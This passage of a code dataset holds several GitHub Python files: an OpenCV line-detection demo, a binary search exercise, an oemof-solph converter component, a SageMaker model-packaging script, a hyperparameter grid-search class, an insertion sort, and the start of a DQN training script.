cvtColor(blur, cv.COLOR_BGR2GRAY)\n grad_x = cv.Sobel(gray, cv.CV_16SC1, 1, 0)\n grad_y = cv.Sobel(gray, cv.CV_16SC1, 0, 1)\n edge = cv.Canny(grad_x, grad_y, 50, 150)\n dst = cv.bitwise_and(image, image, mask=edge)\n cv.imshow(\"edge\", dst)\n\ndef line_detection(image):\n gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\n edges = cv.Canny(gray, 50, 150, apertureSize=3)\n cv.imshow(\"gray\", edges)\n lines = cv.HoughLines(edges, 1, np.pi/180, 200)\n for line in lines:\n rho, theta = line[0]\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a * rho\n y0 = b * rho\n x1 = int(x0 + 1000 * (-b))\n y1 = int(y0 + 1000 * a)\n x2 = int(x0 - 1000 * (-b))\n y2 = int(y0 - 1000 * a)\n cv.line(image, (x1, y1), (x2, y2), (255, 0 ,0), 2)\n cv.namedWindow(\"lines\", cv.WINDOW_NORMAL)\n cv.imshow(\"lines\", image)\n\n\ndef line_detection_possible_demo(image):\n gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\n edges = cv.Canny(gray, 50, 150, apertureSize=3)\n lines = cv.HoughLinesP(edges, 1, np.pi/180, 100, minLineLength= 50, maxLineGap= 10)\n for line in lines:\n x1, y1, x2, y2 = line[0]\n cv.line(image, (x1, y1), (x2, y2), (0, 0, 255), 2)\n cv.namedWindow(\"line_possible\", cv.WINDOW_NORMAL)\n cv.imshow(\"line_possible\", image)\n\n\n\n\n\nsrc = cv.imread(\"line.jpg\")\n# line_detection(src)\nline_detection_possible_demo(src)\ncv.waitKey(0)\ncv.destroyAllWindows()\n","repo_name":"xtings/openCV_demo","sub_path":"tut14_canny.py","file_name":"tut14_canny.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13003054908","text":"import sys\nsys.stdin = open(\"[TST] 숫자 찾기 (이진탐색)_input.txt\", \"r\")\n\ndef binary_search(a, key):\n start = 0\n end = len(a) - 1\n while start <= end:\n middle = (start + end) // 2\n\n if key == a[middle]: # 검색성공\n return middle + 1\n elif key < a[middle]:\n end = middle - 1\n else:\n start = middle + 1\n return 0\n\nN = int(input())\ndata = list(map(int, input().split()))\nT = int(input())\nkey = list(map(int, input().split()))\n\nfor i in key:\n print(binary_search(data, i))","repo_name":"hongyong3/TIL","sub_path":"Algorithm/문제/수업/D-13t/AD/[TST] 숫자 찾기 (이진탐색).py","file_name":"[TST] 숫자 찾기 (이진탐색).py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73828670547","text":"from warnings import warn\n\nfrom oemof.network import Node\nfrom pyomo.core import BuildAction\nfrom pyomo.core.base.block import ScalarBlock\nfrom pyomo.environ import Constraint\nfrom pyomo.environ import Set\n\nfrom oemof.solph._plumbing import sequence\n\n\nclass OffsetConverter(Node):\n \"\"\"An object with one input and one output and two coefficients to model\n part load behaviour.\n\n Parameters\n ----------\n coefficients : tuple, (:math:`C_0(t)`, :math:`C_1(t)`)\n Tuple containing the first two polynomial coefficients\n i.e. the y-intersection and slope of a linear equation.\n The tuple values can either be a scalar or a sequence with length\n of time horizon for simulation.\n\n Notes\n -----\n The sets, variables, constraints and objective parts are created\n * :py:class:`~oemof.solph.components._offset_converter.OffsetConverterBlock`\n\n Examples\n --------\n >>> from oemof import solph\n >>> bel = solph.buses.Bus(label='bel')\n >>> bth = solph.buses.Bus(label='bth')\n >>> ostf = solph.components.OffsetConverter(\n ... label='ostf',\n ... inputs={bel: solph.flows.Flow()},\n ... outputs={bth: solph.flows.Flow(\n ... 
nominal_value=60, min=0.5, max=1.0,\n ... nonconvex=solph.NonConvex())},\n ... coefficients=(20, 0.5))\n >>> type(ostf)\n \n \"\"\" # noqa: E501\n\n def __init__(\n self,\n inputs,\n outputs,\n label=None,\n coefficients=None,\n custom_attributes=None,\n ):\n if custom_attributes is None:\n custom_attributes = {}\n super().__init__(\n inputs=inputs,\n outputs=outputs,\n label=label,\n **custom_attributes,\n )\n\n if coefficients is not None:\n self.coefficients = tuple([sequence(i) for i in coefficients])\n if len(self.coefficients) != 2:\n raise ValueError(\n \"Two coefficients or coefficient series have to be given.\"\n )\n\n # `OffsetConverter` always needs the `NonConvex` attribute, but the\n # `Investment` attribute is optional. If it is used, the\n # `InvestNonConvexFlow` will be used in the definition of constraints,\n # otherwise, the `NonConvexFlow` will be used.\n if len(self.outputs):\n for v in self.outputs.values():\n if not v.nonconvex:\n raise TypeError(\n \"Output flow must have the `NonConvex` attribute!\"\n )\n\n # `Investment` and `NonConvex` attributes cannot be defined for the\n # input flow.\n if len(self.inputs):\n for v in self.inputs.values():\n if v.investment:\n raise TypeError(\n \"`Investment` attribute must be defined only for the \"\n + \"output flow!\"\n )\n if v.nonconvex:\n raise TypeError(\n \"`NonConvex` attribute must be defined only for the \"\n + \"output flow!\"\n )\n\n if len(self.inputs) > 1 or len(self.outputs) > 1:\n raise ValueError(\n \"Component `OffsetConverter` must not have \"\n + \"more than 1 input and 1 output!\"\n )\n\n def constraint_group(self):\n return OffsetConverterBlock\n\n\n# --- BEGIN: To be removed for versions >= v0.6 ---\nclass OffsetTransformer(OffsetConverter):\n def __init__(\n self,\n inputs,\n outputs,\n label=None,\n coefficients=None,\n custom_attributes=None,\n ):\n super().__init__(\n label=label,\n inputs=inputs,\n outputs=outputs,\n coefficients=coefficients,\n custom_attributes=custom_attributes,\n )\n warn(\n \"solph.components.OffsetTransformer has been renamed to\"\n \" solph.components.OffsetConverter. The transitional wrapper\"\n \" will be deleted in the future.\",\n FutureWarning,\n )\n\n\n# --- END ---\n\n\nclass OffsetConverterBlock(ScalarBlock):\n r\"\"\"Block for the relation of nodes with type\n :class:`~oemof.solph.components._offset_converter.OffsetConverter`\n\n **The following constraints are created:**\n\n .. _OffsetConverter-equations:\n\n .. 
math::\n &\n P_{in}(p, t) = C_1(t) \\cdot P_{out}(p, t) + C_0(t) \\cdot P_max(p) \\cdot Y(t) \\\\\n\n\n The symbols used are defined as follows (with Variables (V) and Parameters (P)):\n\n +--------------------+------------------------+------+--------------------------------------------+\n | symbol | attribute | type | explanation |\n +====================+========================+======+============================================+\n | :math:`P_{out}(t)` | `flow[n,o,p,t]` | V | Outflow of converter |\n +--------------------+------------------------+------+--------------------------------------------+\n | :math:`P_{in}(t)` | `flow[i,n,p,t]` | V | Inflow of converter |\n +--------------------+------------------------+------+--------------------------------------------+\n | :math:`Y(t)` | | V | Binary status variable of nonconvex inflow |\n +--------------------+------------------------+------+--------------------------------------------+\n | :math:`P_{max}(t)` | | V | Maximum Outflow of converter |\n +--------------------+------------------------+------+--------------------------------------------+\n | :math:`C_1(t)` | `coefficients[1][n,t]` | P | Linear coefficient 1 (slope) |\n +--------------------+------------------------+------+--------------------------------------------+\n | :math:`C_0(t)` | `coefficients[0][n,t]` | P | Linear coefficient 0 (y-intersection) |\n +--------------------+------------------------+------+--------------------------------------------+\n\n Note that :math:`P_{max}(t) \\cdot Y(t)` is merged into one variable,\n called `status_nominal[n, o, p, t]`.\n \"\"\" # noqa: E501\n CONSTRAINT_GROUP = True\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def _create(self, group=None):\n \"\"\"Creates the relation for the class:`OffsetConverter`.\n\n Parameters\n ----------\n group : list\n List of oemof.solph.experimental.OffsetConverter objects for\n which the relation of inputs and outputs is created\n e.g. group = [ostf1, ostf2, ostf3, ...]. The components inside\n the list need to hold an attribute `coefficients` of type dict\n containing the conversion factors for all inputs to outputs.\n \"\"\"\n if group is None:\n return None\n\n m = self.parent_block()\n\n self.OFFSETCONVERTERS = Set(initialize=[n for n in group])\n\n in_flows = {n: [i for i in n.inputs.keys()] for n in group}\n out_flows = {n: [o for o in n.outputs.keys()] for n in group}\n\n self.relation = Constraint(\n [\n (n, i, o, p, t)\n for p, t in m.TIMEINDEX\n for n in group\n for o in out_flows[n]\n for i in in_flows[n]\n ],\n noruleinit=True,\n )\n\n def _relation_rule(block):\n \"\"\"Link binary input and output flow to component outflow.\"\"\"\n for p, t in m.TIMEINDEX:\n for n in group:\n for o in out_flows[n]:\n for i in in_flows[n]:\n expr = 0\n expr += -m.flow[n, o, p, t]\n expr += m.flow[i, n, p, t] * n.coefficients[1][t]\n # `Y(t)` in the last term of the constraint\n # (\":math:`C_0(t) \\cdot Y(t)`\") is different for\n # different cases. If both `Investment` and\n # `NonConvex` attributes are used for the\n # `OffsetConverter`, `Y(t)` would represent the\n # `status_nominal[n,o,t]` in the\n # `InvestNonConvexFlow`. 
But if only the\n # `NonConvex` attribute is defined for the\n # `OffsetConverter`, `Y(t)` would correspond to\n # the `status_nominal[n,o,t]` in the\n # `NonConvexFlow`.\n try:\n expr += (\n m.InvestNonConvexFlowBlock.status_nominal[\n n, o, t\n ]\n * n.coefficients[0][t]\n )\n # `KeyError` occurs when more than one\n # `OffsetConverter` is defined, and in some of\n # them only the `NonConvex` attribute is\n # considered, while in others both `NonConvex`\n # and `Investment` attributes are defined.\n # `AttributeError` only occurs when the\n # `OffsetConverter` has only the `NonConvex`\n # attribute, and therefore,\n # `m.InvestNonConvexFlowBlock.status_nominal`\n # (inside the `try` block) does not exist.\n except (KeyError, AttributeError):\n expr += (\n m.NonConvexFlowBlock.status_nominal[\n n, o, t\n ]\n * n.coefficients[0][t]\n )\n block.relation.add((n, i, o, p, t), (expr == 0))\n\n self.relation_build = BuildAction(rule=_relation_rule)\n","repo_name":"oemof/oemof-solph","sub_path":"src/oemof/solph/components/_offset_converter.py","file_name":"_offset_converter.py","file_ext":"py","file_size_in_byte":10298,"program_lang":"python","lang":"en","doc_type":"code","stars":255,"dataset":"github-code","pt":"48"} +{"seq_id":"37615301363","text":"# a = 9\n# wantedLength = 5\n# ans = [0]*wantedLength\n\n# for i in range(wantedLength):\n# quo = a // (2**(wantedLength-1-i))\n# rem = a % (2**(wantedLength-1-i))\n\n# if quo == 1:\n# a = rem\n# ans[i] = 1\n\n# print(ans)\n\n# a = 20\n\n\n# def binary(n):\n# if n <= 1:\n# return str(n)\n# else:\n# return binary(n//2) + str(n % 2)\n\n\n# print(binary(a))\n\na = 9\nwantedLength = 5\n\n\ndef binary(n):\n output = \"\"\n for j in range(wantedLength-1, -1, -1):\n output += \"1\" if n & (1 << j) else \"0\"\n return output\n\n\nprint(binary(a))\n","repo_name":"harimchung/algorithm","sub_path":"numbers.py","file_name":"numbers.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26544732860","text":"import argparse\nimport boto3\nfrom distutils.dir_util import copy_tree\nfrom huggingface_hub import snapshot_download\nimport json\nimport logging\nimport os\nfrom pathlib import Path\nimport sagemaker.session\nfrom sagemaker.huggingface.model import HuggingFaceModel\nimport tarfile\nfrom tempfile import TemporaryDirectory\nimport time\nfrom zipfile import ZipFile\n\nBASE_DIR = os.path.dirname(os.path.realpath(__file__))\nmodel_dir_name = \"model\"\ns3_artifacts_path = \"artifacts/lambda\"\ns3_model_path = \"models\"\n\nlogger = logging.getLogger(__name__)\n\nsagemaker_session = sagemaker.Session()\n\ns3_client = boto3.client(\"s3\")\nsagemaker_client = boto3.client(\"sagemaker\")\n\n# helper to create the model.tar.gz\ndef compress(tar_dir=None, output_file=\"model.tar.gz\"):\n parent_dir = os.getcwd()\n os.chdir(tar_dir)\n with tarfile.open(os.path.join(parent_dir, output_file), \"w:gz\") as tar:\n for item in os.listdir('.'):\n print(item)\n tar.add(item, arcname=item)\n os.chdir(parent_dir)\n\n\ndef extend_config(args, stage_config, container_def):\n \"\"\"\n Extend the stage configuration with additional parameters and tags based.\n \"\"\"\n # Verify that config has parameters and tags sections\n if not \"Parameters\" in stage_config or not \"StageName\" in stage_config[\"Parameters\"]:\n raise Exception(\"Configuration file must include SageName parameter\")\n if not \"Tags\" in stage_config:\n stage_config[\"Tags\"] = {}\n # Create new params and tags\n 
new_params = {\n \"ContainerImage\": container_def[\"Image\"],\n \"EndpointInstanceCount\": str(args.inference_instance_count),\n \"EndpointInstanceType\": args.inference_instance_type,\n \"EndpointName\": args.endpoint_name,\n \"LambdaName\": args.lambda_name,\n \"LambdaPath\": s3_artifacts_path + \"/lambda.zip\",\n \"ModelDataUrl\": container_def[\"ModelDataUrl\"],\n \"ModelName\": args.model_name + \"-\" + str(round(time.time())),\n \"ModelExecutionRoleArn\": args.model_execution_role,\n \"S3BucketArtifacts\": args.default_bucket,\n \"SageMakerProjectName\": args.sagemaker_project_name,\n \"SageMakerProjectId\": args.sagemaker_project_id\n }\n\n new_tags = {\n \"sagemaker:deployment-stage\": stage_config[\"Parameters\"][\"StageName\"],\n \"sagemaker:project-id\": args.sagemaker_project_id,\n \"sagemaker:project-name\": args.sagemaker_project_name,\n }\n # Add tags from Project\n get_pipeline_custom_tags(args, sagemaker_client, new_tags)\n\n return {\n \"Parameters\": {**stage_config[\"Parameters\"], **new_params},\n \"Tags\": {**stage_config.get(\"Tags\", {}), **new_tags},\n }\n\ndef get_pipeline_custom_tags(args, sagemaker_client, new_tags):\n try:\n response = sagemaker_client.list_tags(\n ResourceArn=args.sagemaker_project_arn)\n project_tags = response[\"Tags\"]\n for project_tag in project_tags:\n new_tags[project_tag[\"Key\"]] = project_tag[\"Value\"]\n except:\n logger.error(\"Error getting project tags\")\n return new_tags\n\ndef get_cfn_style_config(stage_config):\n parameters = []\n for key, value in stage_config[\"Parameters\"].items():\n parameter = {\n \"ParameterKey\": key,\n \"ParameterValue\": value\n }\n parameters.append(parameter)\n tags = []\n for key, value in stage_config[\"Tags\"].items():\n tag = {\n \"Key\": key,\n \"Value\": value\n }\n tags.append(tag)\n return parameters, tags\n\ndef create_cfn_params_tags_file(config, export_params_file, export_tags_file):\n # Write Params and tags in separate file for Cfn cli command\n parameters, tags = get_cfn_style_config(config)\n with open(export_params_file, \"w\") as f:\n json.dump(parameters, f, indent=4)\n with open(export_tags_file, \"w\") as f:\n json.dump(tags, f, indent=4)\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--log-level\", type=str, default=os.environ.get(\"LOGLEVEL\", \"INFO\").upper())\n parser.add_argument(\"--aws-region\", type=str, required=True)\n parser.add_argument(\"--default-bucket\", type=str, required=True)\n parser.add_argument(\"--endpoint_name\", type=str, default=\"flan-t5-endpoint\")\n parser.add_argument(\"--hf-model-id\", type=str, default=\"philschmid/flan-t5-xxl-sharded-fp16\")\n parser.add_argument(\"--inference-transformers-version\", type=str, default=\"4.17\")\n parser.add_argument(\"--inference-framework-version\", type=str, default=\"1.10\")\n parser.add_argument(\"--inference-instance-type\", type=str, default=\"ml.g5.xlarge\")\n parser.add_argument(\"--inference-instance-count\", type=str, default=1)\n parser.add_argument(\"--inference-python-version\", type=str, default=\"py38\")\n parser.add_argument(\"--lambda-name\", type=str, default=\"Multi-Language-GenAI\")\n parser.add_argument(\"--model-execution-role\", type=str, required=True)\n parser.add_argument(\"--model-name\", type=str, default=\"flan-t5-xxl\")\n parser.add_argument(\"--sagemaker-project-id\", type=str, required=True)\n parser.add_argument(\"--sagemaker-project-name\", type=str, required=True)\n parser.add_argument(\"--sagemaker-project-arn\", type=str, required=False)\n 
parser.add_argument(\"--import-staging-config\", type=str, default=\"staging-config.json\")\n parser.add_argument(\"--export-staging-config\", type=str, default=\"staging-config-export.json\")\n parser.add_argument(\"--export-staging-params\", type=str, default=\"staging-params-export.json\")\n parser.add_argument(\"--export-staging-tags\", type=str, default=\"staging-tags-export.json\")\n parser.add_argument(\"--export-cfn-params-tags\", type=bool, default=False)\n\n args, _ = parser.parse_known_args()\n\n # Configure logging to output the line number and message\n log_format = \"%(levelname)s: [%(filename)s:%(lineno)s] %(message)s\"\n logging.basicConfig(format=log_format, level=args.log_level)\n\n model_dir = Path(os.path.join(BASE_DIR, model_dir_name))\n\n if not os.path.isdir(os.path.join(BASE_DIR, model_dir_name)):\n model_dir.mkdir()\n\n with TemporaryDirectory() as tmpdir:\n # download snapshot\n snapshot_dir = snapshot_download(repo_id=args.hf_model_id, cache_dir=tmpdir)\n # copy snapshot to model dir\n copy_tree(snapshot_dir, str(model_dir))\n\n copy_tree(os.path.join(BASE_DIR, \"code\") + \"/\", str(model_dir.joinpath(\"code\")))\n\n compress(str(model_dir))\n\n model_url = sagemaker.Session().upload_data(\n os.path.join(BASE_DIR, \"model.tar.gz\"),\n bucket=args.default_bucket,\n key_prefix=\"/\".join([s3_model_path, args.model_name])\n )\n\n logger.info(\"S3 model url: {}\".format(model_url))\n\n model = HuggingFaceModel(\n name=args.model_name,\n transformers_version=args.inference_transformers_version,\n pytorch_version=args.inference_framework_version,\n py_version=args.inference_python_version,\n model_data=model_url,\n role=args.model_execution_role,\n sagemaker_session=sagemaker_session\n )\n\n container_def = model.prepare_container_def(instance_type=args.inference_instance_type)\n\n with ZipFile(os.path.join(BASE_DIR, \"lambda.zip\"), 'w') as zip_object:\n # Adding files that need to be zipped\n zip_object.write(os.path.join(BASE_DIR, \"lambda\", \"handler.py\"), \"lambda/handler.py\")\n\n lambda_url = sagemaker.Session().upload_data(\n os.path.join(BASE_DIR, \"lambda.zip\"),\n bucket=args.default_bucket,\n key_prefix=s3_artifacts_path\n )\n\n logger.info(\"S3 lambda url: {}\".format(lambda_url))\n\n # Write the staging config\n with open(args.import_staging_config, \"r\") as f:\n staging_config = extend_config(args, json.load(f), container_def)\n logger.debug(\"Staging config: {}\".format(json.dumps(staging_config, indent=4)))\n with open(args.export_staging_config, \"w\") as f:\n json.dump(staging_config, f, indent=4)\n if (args.export_cfn_params_tags):\n create_cfn_params_tags_file(staging_config, args.export_staging_params, args.export_staging_tags)\n\nif __name__ == \"__main__\":\n main()","repo_name":"brunopistone/flan-t5-multi-language","sub_path":"project/seedcode/ml-deploy/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":8096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73168393107","text":"import numpy as np\nimport pandas as pd\nfrom datetime import datetime\n\nclass ValidateCoarseToFine():\n \"\"\"Class to perform a coarse-to-fine hyperparameter tuning\"\"\"\n def __init__(self, score, dir_name, exp_name, p1_init=1, p2_init=10, gamma1=3, gamma2=3, decay_factor=0.5, grid_size=3, freeze_p2=False, verbose=True, gamma_stop=1.05, p1_max=float('inf'), p2_max=float('inf'), **kwargs):\n \"\"\" Parameters\n ----------\n score: function\n function that takes as input the parameters 
and return a tuple (psnr, ssim, niter) corresponding to the average metrics over the validation set of a method. Nb: if freeze_p2 is True, the function should take only one parameter\n dir_name: string\n directory where to store the results\n exp_name: string\n name of the experiment to store the results\n p1_init: float\n initial value of the first parameter\n p2_init: float\n initial value of the second parameter\n gamma1: float\n initial multiplicative grid scale for the first parameter\n gamma2: float\n initial multiplicative grid scale for the second parameter\n decay_factor: float\n multiplicative factor to update the grid scale when going finer\n grid_size: int\n size of the local grid explore the performace of the method\n freeze_p2: bool\n if True, the second parameter is not optimized => faster procedure\n verbose: bool\n\n gamma_stop: float\n if gamma1 < gamma_stop and gamma2 < gamma_stop, the procedure stops. Should be > 1\n gamma_1_stop: float\n if defined, the stopping criterion for the first parameter, otherwise gamma_stop is used\n gamma_2_stop: float\n if defined, the stopping criterion for the first parameter, otherwise gamma_stop is used\n p1_max: float\n upper bound for the first parameter\n p2_max: float\n upper bound for the second parameter\n \"\"\"\n \n\n # the score function takes as input the parameters p1 (and possibily p2) and return tuple (psnr, ssim, niter)\n def score_modified(p1, p2):\n if self.freeze_p2:\n return(score(p1))\n else:\n return(score(p1, p2))\n\n self.score = score_modified\n\n # dir to store continuously the results\n self.dir_name = dir_name\n # name of the experiment\n self.exp_name = f\"validation_scores_{exp_name}\"\n\n # upper-bound, if any\n self.p1_max = p1_max\n self.p2_max = p2_max\n\n # initiliaze the parameters\n self.p1 = p1_init\n self.p2 = p2_init\n\n # initialize the grid scale in the two directions\n self.gamma1 = gamma1\n self.gamma2 = gamma2\n\n # decay factor to update grid scale\n self.decay_factor = decay_factor\n\n # local grid size\n self.grid_size = grid_size\n # tensor to store temporarily the scores on the local (grid_size x grid_size) grid\n self.psnr_grid = np.zeros((grid_size, grid_size))\n self.ssim_grid = np.zeros((grid_size, grid_size))\n \n # Dataframe to store all results computed\n cols = [\"exp\", \"p1\", \"p2\", \"psnr\", \"ssim\", \"niter\", \"date\"]\n dtype = [\"string\", \"float\", \"float\", \"float\", \"float\", \"float\", \"string\"]\n self.scores= pd.concat([pd.Series(name=col, dtype=dt) for col, dt in zip(cols, dtype)], axis=1)\n\n\n # verbose\n self.verbose = verbose\n\n # only optimize over p1\n self.freeze_p2 = freeze_p2\n\n gamma_1_stop = kwargs.get('gamma_1_stop', None)\n gamma_2_stop = kwargs.get('gamma_2_stop', None)\n\n if gamma_1_stop is None:\n self.gamma_1_stop = gamma_stop\n else:\n self.gamma_1_stop = gamma_1_stop\n\n if gamma_2_stop is None:\n self.gamma_2_stop = gamma_stop\n else:\n self.gamma_2_stop = gamma_2_stop\n\n \n\n\n # update scores on the local grid\n def update_scores(self):\n #print(\"---- computing scores on the updated local grid ----\")\n self.psnr_grid[:, :] = - np.inf\n self.ssim_grid[:, :] = - np.inf\n\n if self.freeze_p2:\n loop2 = 1\n else:\n loop2 = self.grid_size\n\n for k in range(self.grid_size):\n for j in range(loop2):\n\n\n p1 = self.p1*(self.gamma1)**k\n p2 = self.p2*(self.gamma2)**j\n\n \n \n # check if psnr already computed for (almost) the same parameters\n df_t = self.scores[((1 - self.scores[\"p1\"]/p1).abs()<(1e-4))]\n df_t = df_t[(df_t[\"p2\"]/p2 - 
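# Sketch (illustrative, not part of the original record): the scores table in
# ValidateCoarseToFine above is built by concatenating empty, explicitly-typed
# Series, which yields an empty DataFrame with fixed column dtypes (a plain
# pd.DataFrame(columns=...) would default every column to object).
import pandas as pd

cols, dtypes = ["exp", "p1", "psnr"], ["string", "float", "float"]
scores = pd.concat([pd.Series(name=c, dtype=d) for c, d in zip(cols, dtypes)], axis=1)
assert list(scores.columns) == cols and len(scores) == 0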
1).abs()<(1e-4)]\n \n sk = False\n sk_p1 = False\n sk_p2 = False\n\n def printLine(n):\n if self.verbose:\n print(\"\\n\")\n st = f'=== Effective iter {n} === Job {self.exp_name.replace(\"validation_scores_\", \"\")} ==='\n print(len(st)*\"_\")\n print(st)\n if self.freeze_p2:\n print(f\"=== Parameter: p1={p1:.2e}\")\n else:\n print(f\"=== Parameters: p1={p1:.2e}, p2={p2:.2e}\")\n\n if df_t.shape[0] > 0:\n psnr_t = df_t.iloc[0, 3]\n ssim_t = df_t.iloc[0, 4]\n niter_t = df_t.iloc[0, 5]\n sk = True\n self.psnr_grid[k, j] = psnr_t\n self.ssim_grid[k, j] = ssim_t\n printLine(len(self.scores))\n\n elif (p1 > self.p1_max):\n sk_p1 = True\n printLine(len(self.scores))\n elif (p2 > self.p2_max):\n sk_p2 = True\n printLine(len(self.scores))\n else:\n printLine(len(self.scores) + 1)\n psnr_t, ssim_t, niter_t = self.score(p1, p2)\n \n self.psnr_grid[k, j] = psnr_t\n self.ssim_grid[k, j] = ssim_t\n\n df2 = pd.DataFrame([[self.exp_name, p1, p2, psnr_t, ssim_t, niter_t, get_time_str()]], columns=self.scores.columns)\n self.scores = pd.concat((self.scores, df2))\n self.save_scores()\n \n \n if self.verbose:\n \n if not(sk_p1 or sk_p2):\n print(f\"\\n \\t psnr={psnr_t:.2f}dB (best {self.scores['psnr'].max():.2f}dB)\")\n if sk:\n print(f\" \\t \\t (computation skipped since found values for p1={df_t.iloc[0, 1]:.3f}, p2={df_t.iloc[0, 2]:.3f})\")\n if sk_p1:\n print(f\" \\t \\t (skipping value since p1 greater than {self.p1_max})\")\n if sk_p2:\n print(f\" \\t \\t (skipping value since p2 greater than {self.p2_max})\")\n \n #print(f\"SSIM {ssim_t:.3f} __ running max {self.scores['ssim'].max():.3f}\")\n \n def save_scores(self):\n self.scores.to_csv(f\"{self.dir_name}/{self.exp_name}.csv\")\n\n # update grid properties based on the scores\n def update_grid(self):\n print(\"\\n\")\n print(\"**** UPDATING THE GRID PARAMETERS ****\")\n ind = np.unravel_index(np.argmax(self.psnr_grid, axis=None), self.psnr_grid.shape)\n\n if ind[0] == 0:\n self.p1 = self.p1 * (self.gamma1)**(-(self.grid_size//2))\n print(\"-[p1] lower border hit => shifting grid down\")\n elif ind[0] == self.grid_size - 1:\n \n self.p1 = self.p1 * (self.gamma1)**(self.grid_size//2)\n print(\"-[p1] upper border hit => shifting grid up\")\n else:\n # find new center\n p1_new_center = self.p1*(self.gamma1)**ind[0]\n # reduce scale\n self.gamma1 = (self.gamma1**self.decay_factor)\n # update left point\n self.p1 = p1_new_center*self.gamma1**(-(self.grid_size//2))\n print(f\"-[p1] refinining the grid (corner {self.p1:.3e}, scale {self.gamma1:.3e})\")\n self.p1 = min(self.p1, self.p1_max)\n\n\n if not self.freeze_p2:\n if ind[1] == 0:\n print(\"-[p2] lower border hit => shifting grid down\")\n self.p2 = self.p2 * (self.gamma2)**(-(self.grid_size//2))\n \n elif ind[1] == self.grid_size - 1:\n print(\"-[p2] upper border hit => shifting grid up\")\n self.p2 = self.p2 * (self.gamma2)**(self.grid_size//2)\n \n else:\n # find new center\n p2_new_center = self.p2*(self.gamma2)**ind[0]\n # reduce scale\n self.gamma2 = (self.gamma2**self.decay_factor)\n # update left point\n self.p2 = p2_new_center*self.gamma2**(-(self.grid_size//2))\n print(f\"-[p2] refinining the grid (corner {self.p2:.3f}, scale {self.gamma2:.3f})\")\n self.p2 = min(self.p2, self.p2_max)\n\n def run(self):\n print(36*\"*\")\n print(f\"**** COARSE-TO-FINE GRID SEARCH ****\")\n print(36*\"*\")\n print(f\"\\t Job name: {self.exp_name}\")\n if self.freeze_p2:\n while self.gamma1 > self.gamma_1_stop:\n self.update_scores()\n self.update_grid()\n print(\" Job Done \")\n else:\n while (self.gamma1 > 
self.gamma_1_stop) or (self.gamma2 > self.gamma_2_stop):\n self.update_scores()\n self.update_grid()\n print(\" Job Done \")\n\n\ndef get_time_str():\n now = datetime.now()\n return(now.strftime(\"%Y/%m/%d, %H:%M:%S\"))","repo_name":"axgoujon/convex_ridge_regularizers","sub_path":"hyperparameter_tuning/validate_coarse_to_fine.py","file_name":"validate_coarse_to_fine.py","file_ext":"py","file_size_in_byte":9883,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"25878107902","text":"from numba import jit\n\nfrom coding_challenges.algo.sorts.sort_utils import swap\n\n\n@jit(nopython=True, nogil=True, fastmath=True)\ndef insertion_sort(arr, first: int, last: int) -> None:\n for current in range(first + 1, last + 1):\n unsorted = current\n # sinking unsorted down\n while unsorted > first and arr[unsorted] < arr[unsorted - 1]:\n swap(arr, unsorted, unsorted - 1)\n unsorted -= 1\n\n\nif __name__ == \"__main__\":\n arr = [5, 1, 6, 2, 7, 3, 8, 3, 7, 2]\n insertion_sort(arr, 0, len(arr) - 1)\n print(arr)\n","repo_name":"Yamp/home_lab","sub_path":"coding_challenges/algo/sorts/insertion_sort.py","file_name":"insertion_sort.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4504979073","text":"import gym\nimport torch.optim as optim\nimport argparse\nimport warnings\nfrom dqn_model import DQN\nfrom dqn_learn import OptimizerSpec, dqn_learing\nfrom utils.gym import get_env, get_wrapper_by_name\nfrom utils.schedule import LinearSchedule\n\nBATCH_SIZE = 32\nGAMMA = 0.99\nREPLAY_BUFFER_SIZE = 1000000\nLEARNING_STARTS = 50000\nLEARNING_FREQ = 4\nFRAME_HISTORY_LEN = 4\nTARGER_UPDATE_FREQ = 10000\nLEARNING_RATE = 0.00025\nALPHA = 0.95\nEPS = 0.01\n\n\ndef main(task, seed, num_timesteps):\n parser = argparse.ArgumentParser(description='DQN on visual atari board')\n parser.add_argument('-g', '--gpu_idx', type=int, default=0)\n parser.add_argument('-ga', '--gamma', type=float, default=GAMMA)\n parser.add_argument('-l', '--learning', type=float, default=LEARNING_RATE)\n parser.add_argument('-lo', '--loss', default='MSE')\n parser.add_argument('-c', '--config_name', default='')\n parser.add_argument('-s', '--stats_name')\n parser.add_argument('-d', '--dir')\n parser.add_argument('-a', '--actor', default='greedy', help='greedy, softmax or noisy')\n parser.add_argument('-b', '--beta', type=float, default=1, help='softmax beta')\n parser.add_argument('--bsched', type=bool, default=False, help='beta scheduling')\n parser.add_argument('-i', '--init_std', type=float, default=1e-1, help='Initial std for noisy actor')\n parser.add_argument('-r', '--replay_buffer_size', type=int, default=REPLAY_BUFFER_SIZE)\n args = parser.parse_args()\n gpu_idx = args.gpu_idx\n\n if args.dir:\n direc = args.dir\n warnings.warn(\n \"args.dir is deprecated, use config_name instead\",\n DeprecationWarning\n )\n else:\n direc = 'tmp/gym-results/'\n if args.config_name:\n direc = f'{direc}{args.config_name}/'\n\n if args.stats_name:\n stats_name = args.stats_name\n warnings.warn(\n \"args.stats_name is deprecated, use config_name instead\",\n DeprecationWarning\n )\n else:\n stats_name = 'statistics.pkl'\n if args.config_name:\n stats_name = f'statistics_{args.config_name}.pkl'\n\n env = get_env(task, seed, direc, video_callable=False)\n\n def stopping_criterion(env_arg):\n # notice that here t is the number of steps of the wrapped env,\n # which is different from the number of 
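# Sketch (illustrative, not part of the original record): the numba-jitted
# insertion sort above compiles on first call; this is the same "sinking"
# loop in plain Python for reference.
def insertion_sort_py(arr):
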